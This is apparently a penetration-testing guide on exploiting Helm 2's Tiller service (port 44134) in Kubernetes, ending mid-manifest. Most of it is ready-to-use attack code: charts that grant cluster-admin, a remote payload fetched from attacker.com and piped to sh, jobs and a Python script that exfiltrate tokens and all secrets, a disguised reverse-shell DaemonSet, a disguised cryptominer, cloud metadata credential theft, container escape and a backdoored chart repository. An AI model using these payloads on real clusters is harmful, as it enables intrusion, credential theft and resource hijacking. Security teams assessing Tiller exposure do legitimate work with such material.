# Tiller / Helm - Port 44134

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}

* Become VeryLazyTech [**member**](https://shop.verylazytech.com/)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses.  📚
  {% endtab %}
  {% endtabs %}

## Basic info

Helm Tiller represents one of the most critical security vulnerabilities in Kubernetes environments. As the server-side component of Helm 2 (the Kubernetes package manager), Tiller's default configuration created a massive attack surface that allowed trivial privilege escalation from any compromised pod to full cluster admin access. While Helm 3 has eliminated Tiller entirely, countless production clusters still run Helm 2, making this a critical security assessment target.

#### The Tiller Problem

**What Makes Tiller So Dangerous?**

1. **No Authentication by Default**: Tiller's gRPC API (port 44134) accepts unauthenticated requests
2. **Cluster-Admin Privileges**: Default installations grant Tiller full cluster admin permissions
3. **Internal Network Exposure**: Any pod in the cluster can reach Tiller
4. **No Network Policies**: Default Kubernetes allows cross-namespace communication
5. **Legacy Deployments**: Many organizations still run Helm 2 in production

#### Impact Scenarios

When Tiller is compromised, attackers can:

* **Deploy malicious workloads** with cluster-admin privileges
* **Steal all Kubernetes secrets** including service account tokens
* **Pivot to cloud provider APIs** (AWS, GCP, Azure)
* **Establish persistent backdoors** in the cluster
* **Exfiltrate sensitive data** from all namespaces
* **Launch cryptominers** using cluster resources
* **Move laterally** to other connected systems

#### Historical Context

* **2018**: Security researchers publicly demonstrate Tiller exploitation
* **2019**: Multiple tools and exploits released (ropnop's pentest\_charts, munnerz/helmsploit)
* **2019**: Helm 3 announced with Tiller removal
* **2020**: CVE-2019-4185 published affecting IBM InfoSphere
* **2025**: Helm 2 officially deprecated, but still widely deployed

***

### Understanding Helm and Tiller Architecture&#x20;

#### What is Helm?

Helm is the **package manager for Kubernetes**, analogous to:

* `apt`/`yum` for Linux
* `homebrew` for macOS
* `npm` for Node.js

**Helm Charts** package Kubernetes YAML manifests into reusable, configurable deployments.

#### Helm 2 vs Helm 3

**Helm 2 Architecture (with Tiller)**

```
┌─────────────────┐
│  Helm Client    │
│  (Local CLI)    │
└────────┬────────┘
         │
         │ gRPC (port-forward)
         │
         ▼
┌─────────────────────────────────────┐
│   Kubernetes Cluster                │
│                                     │
│  ┌──────────────────┐              │
│  │  Tiller Pod      │              │
│  │  Port: 44134     │              │
│  │  Service Account:│──────┐       │
│  │  cluster-admin   │      │       │
│  └──────────────────┘      │       │
│         │                  │       │
│         │ Kubernetes API   │       │
│         ▼                  ▼       │
│  ┌──────────────────────────────┐ │
│  │   Kubernetes API Server      │ │
│  └──────────────────────────────┘ │
└─────────────────────────────────────┘
```

**Helm 3 Architecture (no Tiller)**

```
┌─────────────────┐
│  Helm Client    │
│  (Local CLI)    │
└────────┬────────┘
         │
         │ Direct API calls
         │
         ▼
┌─────────────────────────────────────┐
│   Kubernetes Cluster                │
│                                     │
│  ┌──────────────────────────────┐  │
│  │   Kubernetes API Server      │  │
│  │   (User RBAC applied)        │  │
│  └──────────────────────────────┘  │
└─────────────────────────────────────┘
```

**Key Difference**: Helm 3 eliminates the server-side component (Tiller), communicating directly with the Kubernetes API using the user's own credentials and RBAC permissions.

#### Tiller Service Account & RBAC

In typical default installations, Tiller is configured with:

```yaml
apiVersion: v1
kind: ServiceAccount
metadata:
  name: tiller
  namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: tiller
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin  # FULL ADMIN PRIVILEGES
subjects:
  - kind: ServiceAccount
    name: tiller
    namespace: kube-system
```

This grants Tiller:

* Full read/write access to all namespaces
* Ability to create/delete any resource
* Access to all secrets
* Cluster-level administrative functions

#### Tiller Communication Protocol

**Port**: 44134/TCP\
**Protocol**: gRPC (HTTP/2)\
**Authentication**: None by default\
**Encryption**: None by default (can be configured with TLS)

**gRPC API Endpoints** (from Protobuf definitions):

```protobuf
service ReleaseService {
    rpc ListReleases(ListReleasesRequest) returns (stream ListReleasesResponse) {}
    rpc GetReleaseStatus(GetReleaseStatusRequest) returns (GetReleaseStatusResponse) {}
    rpc GetReleaseContent(GetReleaseContentRequest) returns (GetReleaseContentResponse) {}
    rpc UpdateRelease(UpdateReleaseRequest) returns (UpdateReleaseResponse) {}
    rpc InstallRelease(InstallReleaseRequest) returns (InstallReleaseResponse) {}
    rpc UninstallRelease(UninstallReleaseRequest) returns (UninstallReleaseResponse) {}
    rpc GetVersion(GetVersionRequest) returns (GetVersionResponse) {}
    rpc RollbackRelease(RollbackReleaseRequest) returns (RollbackReleaseResponse) {}
    rpc GetHistory(GetHistoryRequest) returns (GetHistoryResponse) {}
}
```

***

## Why Tiller is a Security Risk&#x20;

#### 1. No Authentication Required

By default, Tiller accepts **any** gRPC request without authentication:

```bash
# Any pod can do this:
helm --host tiller-deploy.kube-system:44134 list
```

**No credentials needed. No API tokens. Nothing.**

#### 2. Cluster-Admin Privileges

Tiller's service account has `cluster-admin` role, meaning it can:

```bash
# Create any resource in any namespace
kubectl create deployment malicious -n kube-system

# Read all secrets
kubectl get secrets --all-namespaces

# Create cluster-level resources
kubectl create clusterrolebinding backdoor --clusterrole=cluster-admin --user=attacker

# Delete critical resources
kubectl delete deployment kube-dns -n kube-system
```

#### 3. Network Accessibility

**Kubernetes DNS** makes Tiller discoverable from any pod:

```bash
# From any pod in any namespace:
nslookup tiller-deploy.kube-system.svc.cluster.local
# Returns: 10.96.0.5

telnet tiller-deploy.kube-system.svc.cluster.local 44134
# Connection successful!
```

**No network policies** by default = any pod can reach Tiller.

#### 4. Attack Chain

```
Compromised Pod → Discover Tiller → Talk to Tiller → 
Deploy Privileged Pod → Steal Service Account Token → 
Full Cluster Admin Access → Persistent Backdoor
```

**Time to full compromise**: Minutes

#### 5. Real-World Impact

Organizations affected by Tiller vulnerabilities:

* **Tesla** (2018): Cryptojacking via exposed Kubernetes
* **IBM InfoSphere** (CVE-2019-4185): Privilege escalation
* **Numerous enterprises**: Unreported incidents

***

## Reconnaissance & Discovery&#x20;

#### 1. Internal Discovery (From Compromised Pod)

**Check for Kubernetes Indicators**

```bash
# Are we in a container?
ls -la /.dockerenv

# Kubernetes environment variables
env | grep KUBERNETES

# Check service account
ls -la /var/run/secrets/kubernetes.io/serviceaccount/

# Read namespace
cat /var/run/secrets/kubernetes.io/serviceaccount/namespace
```

**Expected Output:**

```
KUBERNETES_SERVICE_HOST=10.96.0.1
KUBERNETES_SERVICE_PORT=443
```

**DNS-Based Service Discovery**

```bash
# Check DNS configuration
cat /etc/resolv.conf

# Example output:
# nameserver 10.96.0.10
# search default.svc.cluster.local svc.cluster.local cluster.local
# options ndots:5
```

The `search` domains tell us:

* Current namespace: `default`
* Cluster domain: `cluster.local`

**Enumerate Services via DNS**

```bash
# Test for Tiller in kube-system
nslookup tiller-deploy.kube-system.svc.cluster.local

# Alternative DNS tools
getent hosts tiller-deploy.kube-system.svc.cluster.local
host tiller-deploy.kube-system.svc.cluster.local

# Ping test
ping -c 1 tiller-deploy.kube-system.svc.cluster.local
```

**Successful Response:**

```
Server:		10.96.0.10
Address:	10.96.0.10#53

Name:	tiller-deploy.kube-system.svc.cluster.local
Address: 10.98.57.159
```

**Port Scanning from Inside Cluster**

```bash
# Test if port 44134 is open
timeout 1 bash -c 'cat < /dev/null > /dev/tcp/tiller-deploy.kube-system/44134'
echo $?
# 0 = success, port open

# Using netcat (if available)
nc -zv tiller-deploy.kube-system.svc.cluster.local 44134

# Using curl
curl -v tiller-deploy.kube-system.svc.cluster.local:44134
# gRPC will reject HTTP, but confirms port is listening
```

#### 2. External Discovery (Network Perspective)

**Nmap Scanning**

```bash
# Basic port scan
nmap -p 44134 <cluster-node-ip>

# Service version detection
nmap -sV -p 44134 <cluster-node-ip>

# Comprehensive scan
sudo nmap -sS -sV -A -p 44134 <cluster-node-ip>
```

**Expected Output (if exposed):**

```
PORT      STATE SERVICE VERSION
44134/tcp open  unknown
| fingerprint-strings:
|   NULL:
|     HTTP/1.1 400 Bad Request
```

**Shodan Queries**

```
# Search for exposed Tiller instances
port:44134

# Combined with Kubernetes indicators
port:44134 "kubernetes"

# GKE-specific
port:44134 "gke"
```

#### 3. Kubernetes API Discovery (if accessible)

```bash
# List pods in kube-system
kubectl get pods -n kube-system | grep tiller

# List services
kubectl get services -n kube-system | grep tiller

# Describe Tiller deployment
kubectl describe deployment tiller-deploy -n kube-system

# Check service account
kubectl get serviceaccount tiller -n kube-system -o yaml
```

**Example Output:**

```bash
$ kubectl get pods -n kube-system
NAME                                       READY   STATUS    RESTARTS   AGE
tiller-deploy-56b574c76d-l265z             1/1     Running   0          35m

$ kubectl get services -n kube-system
NAME            TYPE        CLUSTER-IP     EXTERNAL-IP   PORT(S)       AGE
tiller-deploy   ClusterIP   10.98.57.159   <none>        44134/TCP     35m
```

#### 4. Cloud Provider Metadata (GKE/EKS/AKS)

**Google Cloud (GKE)**

```bash
# From compromised pod
curl -s -H "Metadata-Flavor: Google" \
  http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env

# Extract master endpoint
curl -s -H "Metadata-Flavor: Google" \
  http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env | \
  grep KUBERNETES_MASTER_NAME
```

**Amazon Web Services (EKS)**

```bash
# Get instance metadata
curl http://169.254.169.254/latest/meta-data/

# Get IAM role
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Get instance identity
curl http://169.254.169.254/latest/dynamic/instance-identity/document
```

**Microsoft Azure (AKS)**

```bash
# Instance metadata
curl -H "Metadata: true" \
  http://169.254.169.254/metadata/instance?api-version=2021-02-01

# MSI token
curl -H "Metadata: true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
```

***

## Enumeration Techniques&#x20;

#### 1. Installing Helm Client in Compromised Pod

```bash
# Set Helm version (match server version)
export HELM_VERSION=v2.17.0

# Download Helm binary
curl -L "https://get.helm.sh/helm-${HELM_VERSION}-linux-amd64.tar.gz" | \
  tar xz --strip-components=1 -C /tmp linux-amd64/helm

# Make executable
chmod +x /tmp/helm

# Initialize client-only (no Tiller installation)
export HELM_HOME=/tmp/helmhome
/tmp/helm init --client-only
```

**Alternative**: Use pre-compiled static binary from GitHub releases

#### 2. Testing Connectivity

```bash
# Set Tiller host
export HELM_HOST=tiller-deploy.kube-system:44134

# Get Helm/Tiller version
/tmp/helm version

# Expected output:
# Client: &version.Version{SemVer:"v2.17.0", ...}
# Server: &version.Version{SemVer:"v2.17.0", ...}
```

**If you see both client and server versions, you have successful communication!**

#### 3. Listing Helm Releases

```bash
# List all releases
/tmp/helm list

# List releases in all namespaces
/tmp/helm list --all

# Get detailed release information
/tmp/helm status <release-name>

# Get release history
/tmp/helm history <release-name>
```

**Example Output:**

```
NAME         REVISION  UPDATED                   STATUS    CHART              NAMESPACE
mycoolblog   1         Mon Jan 28 10:30:00 2019  DEPLOYED  wordpress-5.0.2    default
prometheus   3         Thu Jan 24 15:20:00 2019  DEPLOYED  prometheus-8.9.1   monitoring
```

#### 4. Inspecting Release Content

```bash
# Get release manifest
/tmp/helm get manifest <release-name>

# Get release values
/tmp/helm get values <release-name>

# Get all release information
/tmp/helm get <release-name>
```

This reveals:

* All Kubernetes resources deployed
* Configuration values used
* **Potentially sensitive data** (passwords, API keys, etc.)

#### 5. Discovering Helm Repositories

```bash
# List configured repositories
/tmp/helm repo list

# Search for charts
/tmp/helm search

# Add new repository
/tmp/helm repo add myrepo https://charts.example.com
```

#### 6. Checking Tiller Configuration

```bash
# Get Tiller pod name
kubectl get pods -n kube-system -l app=helm,name=tiller

# Describe Tiller pod
kubectl describe pod <tiller-pod-name> -n kube-system

# Check service account
kubectl get pod <tiller-pod-name> -n kube-system -o jsonpath='{.spec.serviceAccountName}'
```

**Look for:**

* Service account name (usually `tiller`)
* RBAC permissions
* Network policies (or lack thereof)
* TLS configuration

***

## Authentication & Access Analysis&#x20;

#### 1. Understanding Tiller's Default Security Posture

**Default Configuration Issues:**

| Security Control | Default State     | Risk                     |
| ---------------- | ----------------- | ------------------------ |
| Authentication   | **DISABLED**      | Anyone can connect       |
| Authorization    | **DISABLED**      | No access control        |
| TLS/Encryption   | **DISABLED**      | Plaintext communication  |
| Network Policy   | **NONE**          | Accessible from all pods |
| RBAC             | **cluster-admin** | Full cluster privileges  |

#### 2. Testing Authentication

```bash
# Test 1: No authentication required
export HELM_HOST=tiller-deploy.kube-system:44134
/tmp/helm list
# If this works, NO AUTHENTICATION IS REQUIRED

# Test 2: Check if TLS is enforced
/tmp/helm version
# If successful without --tls flag, TLS is NOT enforced

# Test 3: Try with TLS (will fail if not configured)
/tmp/helm version --tls
# Error: transport is closing - TLS not configured
```

#### 3. Analyzing Tiller's Service Account Permissions

From a position with `kubectl` access:

```bash
# Get Tiller's service account
SA=$(kubectl get deploy tiller-deploy -n kube-system \
  -o jsonpath='{.spec.template.spec.serviceAccountName}')

echo "Tiller Service Account: $SA"

# Get ClusterRoleBindings for this SA
kubectl get clusterrolebindings -o json | \
  jq -r '.items[] | select(.subjects[]? | 
    select(.kind=="ServiceAccount" and .name=="'$SA'")) | 
    .metadata.name + " -> " + .roleRef.name'

# Check what Tiller can do
kubectl auth can-i --list --as=system:serviceaccount:kube-system:tiller
```

**Typical Output (vulnerable configuration):**

```
tiller -> cluster-admin

Resources                                       Non-Resource URLs   Resource Names   Verbs
*.*                                            []                  []               [*]
                                               [*]                 []               [*]
```

**This means Tiller can do ANYTHING in the cluster.**

#### 4. Network Policy Analysis

```bash
# Check if network policies exist
kubectl get networkpolicies --all-namespaces

# Check policies affecting kube-system
kubectl get networkpolicies -n kube-system

# Describe network policy
kubectl describe networkpolicy <policy-name> -n kube-system
```

**If output is empty or no policies restrict Tiller, it's accessible from anywhere.**

#### 5. Attempting Unauthorized Access

```python
#!/usr/bin/env python3
"""
Test Tiller gRPC access without Helm client
"""
import grpc
import sys

def test_tiller_access(host='tiller-deploy.kube-system', port=44134):
    """
    Attempt to connect to Tiller gRPC endpoint
    """
    try:
        # Create insecure channel (no TLS)
        channel = grpc.insecure_channel(f'{host}:{port}')
        
        # Try to connect (with timeout)
        grpc.channel_ready_future(channel).result(timeout=5)
        
        print(f"[+] Successfully connected to {host}:{port}")
        print(f"[+] Tiller is accessible without authentication!")
        return True
        
    except grpc.FutureTimeoutError:
        print(f"[-] Connection timeout to {host}:{port}")
        return False
    except Exception as e:
        print(f"[-] Connection failed: {e}")
        return False

if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else 'tiller-deploy.kube-system'
    test_tiller_access(host)
```

***

## Exploitation Techniques&#x20;

#### 1. Basic Privilege Escalation via Helm Chart Deployment

The core exploitation technique is simple:

1. Deploy a malicious Helm chart
2. Chart creates privileged resources
3. Gain elevated access

**Simple Privilege Escalation Chart:**

```yaml
# Chart structure
exploit-chart/
├── Chart.yaml
└── templates/
    ├── serviceaccount.yaml
    ├── clusterrolebinding.yaml
    └── job.yaml
```

**Chart.yaml:**

```yaml
apiVersion: v1
appVersion: "1.0"
description: Privilege Escalation PoC
name: exploit-chart
version: 0.1.0
```

**templates/serviceaccount.yaml:**

```yaml
apiVersion: v1
kind: ServiceAccount
metadata:
  name: {{ .Values.serviceAccountName }}
  namespace: {{ .Values.namespace }}
```

**templates/clusterrolebinding.yaml:**

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: {{ .Values.serviceAccountName }}-binding
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
  - kind: ServiceAccount
    name: {{ .Values.serviceAccountName }}
    namespace: {{ .Values.namespace }}
```

**templates/job.yaml:**

```yaml
apiVersion: batch/v1
kind: Job
metadata:
  name: {{ .Values.jobName }}
  namespace: {{ .Values.namespace }}
spec:
  template:
    spec:
      serviceAccountName: {{ .Values.serviceAccountName }}
      containers:
        - name: privesc
          image: alpine:latest
          command: ["sh", "-c", "echo 'Privileged access gained'; sleep 3600"]
      restartPolicy: Never
```

**Deployment:**

```bash
# Create chart directory
mkdir -p exploit-chart/templates

# Create files (as shown above)

# Deploy chart via Tiller
export HELM_HOST=tiller-deploy.kube-system:44134
/tmp/helm install ./exploit-chart \
  --name pwned \
  --set serviceAccountName=hacker \
  --set namespace=kube-system \
  --set jobName=backdoor
```

Now you have a service account with cluster-admin privileges!

#### 2. Remote Code Execution via Malicious Chart

**Chart that executes arbitrary commands:**

```yaml
# templates/rce-job.yaml
apiVersion: batch/v1
kind: Job
metadata:
  name: {{ .Values.name }}
  namespace: kube-system
spec:
  template:
    spec:
      containers:
        - name: rce
          image: alpine:latest
          command:
            - "/bin/sh"
            - "-c"
            - |
              {{ .Values.command }}
      restartPolicy: Never
```

**Deploy with custom command:**

```bash
/tmp/helm install ./rce-chart \
  --name rce-job \
  --set name=innocent-job \
  --set command="wget http://attacker.com/backdoor.sh -O- | sh"
```

#### 3. Credential Harvesting

**Chart to steal service account tokens:**

```yaml
# templates/token-stealer.yaml
apiVersion: batch/v1
kind: Job
metadata:
  name: token-harvester
  namespace: kube-system
spec:
  template:
    spec:
      serviceAccountName: {{ .Values.targetServiceAccount }}
      containers:
        - name: stealer
          image: curlimages/curl:latest
          command:
            - "sh"
            - "-c"
            - |
              TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
              curl -X POST -d "token=$TOKEN" {{ .Values.exfilURL }}
      restartPolicy: Never
```

**Deploy:**

```bash
/tmp/helm install ./token-stealer \
  --name harvest \
  --set targetServiceAccount=tiller \
  --set exfilURL=https://attacker.com/collect
```

#### 4. Persistent Backdoor Deployment

```yaml
# templates/backdoor-daemonset.yaml
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: system-monitor  # Innocuous name
  namespace: kube-system
  labels:
    k8s-app: system-monitor
spec:
  selector:
    matchLabels:
      name: system-monitor
  template:
    metadata:
      labels:
        name: system-monitor
    spec:
      hostNetwork: true
      hostPID: true
      containers:
        - name: monitor
          image: alpine:latest
          command:
            - "sh"
            - "-c"
            - |
              # Reverse shell
              while true; do
                sh -i >& /dev/tcp/attacker.com/4444 0>&1 || sleep 60
              done
          securityContext:
            privileged: true
          volumeMounts:
            - name: host-root
              mountPath: /host
      volumes:
        - name: host-root
          hostPath:
            path: /
```

This creates a **DaemonSet** that:

* Runs on every node
* Has privileged access
* Maintains reverse shell connection
* Survives pod restarts

#### 5. Cryptomining Deployment

```yaml
# templates/miner.yaml
apiVersion: apps/v1
kind: Deployment
metadata:
  name: analytics-worker  # Disguised name
  namespace: default
spec:
  replicas: {{ .Values.replicas }}
  selector:
    matchLabels:
      app: analytics
  template:
    metadata:
      labels:
        app: analytics
    spec:
      containers:
        - name: worker
          image: xmrig/xmrig:latest
          args:
            - "-o"
            - "pool.minexmr.com:4444"
            - "-u"
            - "{{ .Values.walletAddress }}"
            - "-k"
          resources:
            requests:
              cpu: "100m"
            limits:
              cpu: "4000m"
```

***

## Post-Exploitation & Privilege Escalation&#x20;

#### 1. Stealing Tiller's Service Account Token

This is the **primary privilege escalation path**. Tiller's service account token provides cluster-admin access to the Kubernetes API.

**Method 1: Via Malicious Job**

```yaml
apiVersion: batch/v1
kind: Job
metadata:
  name: token-exfil
  namespace: kube-system
spec:
  template:
    spec:
      serviceAccountName: tiller  # Use Tiller's SA
      containers:
        - name: exfil
          image: curlimages/curl:latest
          command:
            - "sh"
            - "-c"
            - |
              TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
              curl -X POST \
                -H "Content-Type: application/json" \
                -d "{\"token\":\"$TOKEN\"}" \
                https://attacker.com/collect
      restartPolicy: Never
```

**Deploy:**

```bash
/tmp/helm install ./token-exfil \
  --name exfil \
  --namespace kube-system
```

**Method 2: Extract from All Secrets**

```yaml
apiVersion: batch/v1
kind: Job
metadata:
  name: secret-dump
  namespace: kube-system
spec:
  template:
    spec:
      serviceAccountName: cluster-admin-sa
      containers:
        - name: dumper
          image: bitnami/kubectl:latest
          command:
            - "sh"
            - "-c"
            - |
              kubectl get secrets --all-namespaces -o json | \
                curl -X POST \
                -H "Content-Type: application/json" \
                --data-binary @- \
                https://attacker.com/secrets
      restartPolicy: Never
```

First, deploy a chart that creates cluster-admin SA, then use it to dump secrets.

#### 2. Using ropnop's Pentest Charts

**Installation:**

```bash
# Add pentest charts repository
/tmp/helm repo add pentest https://ropnop.github.io/pentest_charts

# Update repositories
/tmp/helm repo update
```

**Available Charts:**

**exfil\_sa\_token**

Steals a specific service account token:

```bash
/tmp/helm install pentest/exfil_sa_token \
  --name steal-tiller \
  --set serviceAccountName=tiller \
  --set exfilURL=https://attacker.com/collect \
  --set name=tiller-deploy
```

**exfil\_secrets**

Creates new cluster-admin SA and extracts ALL secrets:

```bash
/tmp/helm install pentest/exfil_secrets \
  --name dump-all \
  --set serviceAccountName=pwn-sa \
  --set exfilURL=https://attacker.com/dump
```

**Cleanup:**

```bash
/tmp/helm delete --purge steal-tiller
/tmp/helm delete --purge dump-all
```

#### 3. Direct Kubernetes API Access

Once you have Tiller's token:

```bash
# Extract token from captured data
export TOKEN="eyJhbGciOiJSUzI1NiIsImtpZCI6Ik..."

# Get cluster endpoint (from metadata or known)
export K8S_API="https://10.96.0.1:443"

# Test access
curl -k -H "Authorization: Bearer $TOKEN" $K8S_API/api/v1/namespaces

# List all pods
curl -k -H "Authorization: Bearer $TOKEN" \
  $K8S_API/api/v1/pods?limit=500

# Create privileged pod
cat <<EOF | curl -k -H "Authorization: Bearer $TOKEN" \
  -X POST -H "Content-Type: application/json" \
  -d @- $K8S_API/api/v1/namespaces/default/pods
{
  "apiVersion": "v1",
  "kind": "Pod",
  "metadata": {"name": "shell"},
  "spec": {
    "containers": [{
      "name": "shell",
      "image": "alpine",
      "command": ["/bin/sh", "-c", "sleep 3600"]
    }]
  }
}
EOF
```

#### 4. Configuring kubectl with Stolen Token

```bash
# Set cluster configuration
kubectl config set-cluster pwned-cluster \
  --server=https://10.96.0.1:443 \
  --insecure-skip-tls-verify=true

# Set credentials
kubectl config set-credentials tiller-token \
  --token=$TOKEN

# Set context
kubectl config set-context pwned \
  --cluster=pwned-cluster \
  --user=tiller-token

# Use context
kubectl config use-context pwned

# Verify access
kubectl cluster-info
kubectl get nodes
kubectl get pods --all-namespaces
```

**You now have full cluster-admin access!**

#### 5. Establishing Persistent Access

**Create Permanent Backdoor Service Account:**

```yaml
apiVersion: v1
kind: ServiceAccount
metadata:
  name: backdoor-admin
  namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: backdoor-admin
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
  - kind: ServiceAccount
    name: backdoor-admin
    namespace: kube-system
```

```bash
# Apply via kubectl or Helm
kubectl apply -f backdoor-sa.yaml

# Extract token
kubectl get secret -n kube-system \
  $(kubectl get sa backdoor-admin -n kube-system \
    -o jsonpath='{.secrets[0].name}') \
  -o jsonpath='{.data.token}' | base64 -d

# Save token for future access
```

***

## Advanced Attack Scenarios&#x20;

#### 1. Lateral Movement to Cloud Provider

**GKE (Google Kubernetes Engine):**

```bash
# From compromised pod with access to node
curl -H "Metadata-Flavor: Google" \
  http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

# Get GCP project ID
curl -H "Metadata-Flavor: Google" \
  http://metadata.google.internal/computeMetadata/v1/project/project-id

# List GCS buckets using stolen token
curl -H "Authorization: Bearer $GCP_TOKEN" \
  https://www.googleapis.com/storage/v1/b?project=$PROJECT_ID
```

**EKS (AWS Elastic Kubernetes Service):**

```bash
# Get IAM role credentials
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>

# Use credentials with AWS CLI
export AWS_ACCESS_KEY_ID=...
export AWS_SECRET_ACCESS_KEY=...
export AWS_SESSION_TOKEN=...

aws s3 ls
aws ec2 describe-instances
```

**AKS (Azure Kubernetes Service):**

```bash
# Get Azure MSI token
curl -H "Metadata: true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"

# Use token to access Azure resources
curl -H "Authorization: Bearer $AZURE_TOKEN" \
  https://management.azure.com/subscriptions?api-version=2020-01-01
```

#### 2. Container Escape via Privileged Pod

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: escape-pod
  namespace: default
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
    - name: escape
      image: ubuntu:latest
      command: ["/bin/bash", "-c", "sleep 3600"]
      securityContext:
        privileged: true
      volumeMounts:
        - name: host-root
          mountPath: /host
  volumes:
    - name: host-root
      hostPath:
        path: /
        type: Directory
```

**Deploy via Helm:**

```bash
/tmp/helm install ./escape-chart --name escape
```

**Execute escape:**

```bash
# Get shell in privileged pod
kubectl exec -it escape-pod -- /bin/bash

# Now on node filesystem
chroot /host

# You're now root on the node!
```

#### 3. Secret Exfiltration at Scale

```python
#!/usr/bin/env python3
"""
Extract and exfiltrate all Kubernetes secrets
"""
import base64
import json
import requests
import subprocess

def get_all_secrets():
    """
    Use kubectl to get all secrets
    """
    cmd = ["kubectl", "get", "secrets", "--all-namespaces", "-o", "json"]
    result = subprocess.run(cmd, capture_output=True, text=True)
    
    if result.returncode != 0:
        print(f"[-] Error: {result.stderr}")
        return None
    
    return json.loads(result.stdout)

def decode_secrets(secrets_json):
    """
    Decode base64-encoded secret values
    """
    decoded = []
    
    for item in secrets_json.get('items', []):
        namespace = item['metadata']['namespace']
        name = item['metadata']['name']
        secret_type = item['type']
        data = item.get('data', {})
        
        decoded_data = {}
        for key, value in data.items():
            try:
                decoded_data[key] = base64.b64decode(value).decode('utf-8')
            except Exception as e:
                decoded_data[key] = f"<decode_error: {e}>"
        
        decoded.append({
            'namespace': namespace,
            'name': name,
            'type': secret_type,
            'data': decoded_data
        })
    
    return decoded

def exfiltrate(data, url):
    """
    POST secrets to exfil server
    """
    try:
        response = requests.post(
            url,
            json=data,
            headers={'Content-Type': 'application/json'}
        )
        print(f"[+] Exfiltrated {len(data)} secrets")
        return response.status_code == 200
    except Exception as e:
        print(f"[-] Exfiltration failed: {e}")
        return False

if __name__ == "__main__":
    print("[*] Extracting all secrets...")
    secrets = get_all_secrets()
    
    if secrets:
        print(f"[+] Found {len(secrets.get('items', []))} secrets")
        
        decoded = decode_secrets(secrets)
        
        # Exfiltrate
        exfiltrate(decoded, "https://attacker.com/dump")
```

#### 4. Namespace Takeover

```yaml
# Create admin in target namespace
apiVersion: v1
kind: ServiceAccount
metadata:
  name: namespace-admin
  namespace: {{ .Values.targetNamespace }}
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: namespace-admin
  namespace: {{ .Values.targetNamespace }}
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: admin
subjects:
  - kind: ServiceAccount
    name: namespace-admin
    namespace: {{ .Values.targetNamespace }}
```

**Deploy:**

```bash
/tmp/helm install ./namespace-takeover \
  --name takeover-prod \
  --set targetNamespace=production
```

#### 5. Supply Chain Attack via Chart Repository

```bash
# Add malicious chart repository
/tmp/helm repo add malicious https://evil.com/charts

# Create malicious chart that gets installed by others
cat > Chart.yaml <<EOF
apiVersion: v1
name: innocuous-app
version: 1.0.0
description: A normal looking application
EOF

# Package with backdoor
helm package .

# Upload to public repository
# When users install, backdoor is deployed
```

***

## Kubernetes API Takeover&#x20;

#### 1. External API Access with Stolen Token

**GKE Example:**

```bash
# Get external endpoint
MASTER_IP=$(curl -s -H "Metadata-Flavor: Google" \
  http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env | \
  grep KUBERNETES_MASTER_NAME | cut -d: -f2)

# Configure kubectl
kubectl config set-cluster pwned-gke \
  --server=https://$MASTER_IP \
  --insecure-skip-tls-verify=true

kubectl config set-credentials tiller \
  --token=$TILLER_TOKEN

kubectl config set-context pwned-gke \
  --cluster=pwned-gke \
  --user=tiller

kubectl config use-context pwned-gke

# Full cluster access from anywhere!
kubectl get nodes
```

#### 2. Creating Persistent Admin Users

```bash
# Create certificate for new admin
openssl genrsa -out admin.key 2048
openssl req -new -key admin.key -out admin.csr -subj "/CN=admin/O=system:masters"

# Sign with cluster CA (requires cluster-admin access)
kubectl get configmap -n kube-system kube-root-ca.crt -o jsonpath='{.data.ca\.crt}' > ca.crt
kubectl get secret -n kube-system <ca-key-secret> -o jsonpath='{.data.ca-key}' | base64 -d > ca.key

openssl x509 -req -in admin.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out admin.crt -days 365

# Configure kubectl with certificate
kubectl config set-credentials admin \
  --client-certificate=admin.crt \
  --client-key=admin.key

kubectl config set-context admin \
  --cluster=<cluster> \
  --user=admin
```

#### 3. Deploying WebShell for Persistent Access

```yaml
apiVersion: apps/v1
kind: Deployment
metadata:
  name: monitoring-dashboard
  namespace: kube-system
spec:
  replicas: 1
  selector:
    matchLabels:
      app: monitoring
  template:
    metadata:
      labels:
        app: monitoring
    spec:
      serviceAccountName: tiller
      containers:
        - name: dashboard
          image: <your-webshell-image>
          ports:
            - containerPort: 8080
---
apiVersion: v1
